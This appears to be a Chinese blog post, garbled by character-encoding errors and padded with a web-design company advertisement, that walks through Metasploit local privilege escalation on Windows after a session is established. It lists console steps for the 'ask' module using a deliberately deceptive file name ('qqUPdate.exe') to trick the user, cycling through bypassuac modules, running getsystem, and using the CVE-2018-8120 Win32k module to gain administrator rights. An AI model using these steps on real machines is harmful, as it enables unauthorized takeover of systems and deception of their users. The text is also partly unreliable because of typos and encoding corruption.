本篇內(nèi)容介紹了“內(nèi)網(wǎng)滲透之如何理解msf本地提權(quán)”的有關(guān)知識(shí),在實(shí)際案例的操作過程中,不少人都會(huì)遇到這樣的困境,接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧!希望大家仔細(xì)閱讀,能夠?qū)W有所成!
創(chuàng)新互聯(lián)主營(yíng)德陽網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營(yíng)網(wǎng)站建設(shè)方案,重慶APP開發(fā)公司,德陽h5小程序制作搭建,德陽網(wǎng)站營(yíng)銷推廣歡迎德陽等地區(qū)企業(yè)咨詢
前提與目標(biāo)機(jī)建立會(huì)話連接
seach local/ask 搜索關(guān)鍵字local/ask
use 0 進(jìn)入到exploit/windows/local/ask模塊下
show options 查看相關(guān)參數(shù)
set FILENAME qqUPdate.exe 設(shè)置文件名qqUPdate.exe(具有迷惑性的名字都可以)
set session 1 設(shè)置會(huì)話窗口(先查看一下會(huì)話的id)
run執(zhí)行
目標(biāo)機(jī)彈出彈窗
點(diǎn)擊是后,成功進(jìn)入meterpreter命令行
這時(shí)候getsystem就可以成功提權(quán)
search bypassuac 搜索bypassuac關(guān)鍵字(顯示有13個(gè)提取腳本,一個(gè)不行就換一個(gè))
use 3 進(jìn)入編號(hào)為3的提權(quán)腳本模塊
show opthions 查看相關(guān)參數(shù)
查看會(huì)話并且設(shè)置會(huì)話
show targets 顯示可選平臺(tái)
set target 0 設(shè)置為X86
run 執(zhí)行
提權(quán)成功
cve-2018-8120 Win32k權(quán)限提升漏洞],影響范圍(Windows 7 SP1/2008 SP2,2008 R2 SP1)
search cve-2018-8120 查找關(guān)鍵字
use 0 進(jìn)入該模塊
show options 查看相關(guān)參數(shù)
session 查看會(huì)話
設(shè)置為沒有權(quán)限的會(huì)話3
進(jìn)入后直接獲得管理員權(quán)限
“內(nèi)網(wǎng)滲透之如何理解msf本地提權(quán)”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編將為大家輸出更多高質(zhì)量的實(shí)用文章!